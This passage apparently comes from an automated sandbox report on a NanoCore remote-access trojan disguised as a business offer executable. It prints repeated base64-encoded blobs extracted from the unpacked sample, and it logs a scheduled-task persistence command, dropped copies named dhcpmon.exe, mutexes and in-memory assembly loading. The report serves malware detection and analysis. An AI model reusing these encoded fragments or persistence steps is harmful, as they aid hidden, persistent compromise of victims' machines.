spTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: 8.2.dhcpmon.exe.b50000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 8.0.dhcpmon.exe.b50000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 14.2.dhcpmon.exe.960000.1.unpack, LogIn.cs	Base64 encoded string: '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

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/12@18/1

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File created: C:\Users\user\AppData\Roaming\sjZXfoyePbSa.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4112:120:WilError_01
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Mutant created: \Sessions\1\BaseNamedObjects\HlbKKwoAS
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{06dcc34e-fccc-45c0-ab04-0a28b66d80f2}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File created: C:\Users\user\AppData\Local\Temp\tmp66DE.tmp

Jump to behavior

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File read: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe 'C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmpAD4D.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process created: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmpAD4D.tmp'	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: sjZXfoyePbSa.exe.0.dr, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.COMPANY PROFILE AND DOCUMENTED OFFER.exe.a70000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.a70000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.7.dr, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.COMPANY PROFILE AND DOCUMENTED OFFER.exe.9a0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.dhcpmon.exe.b50000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
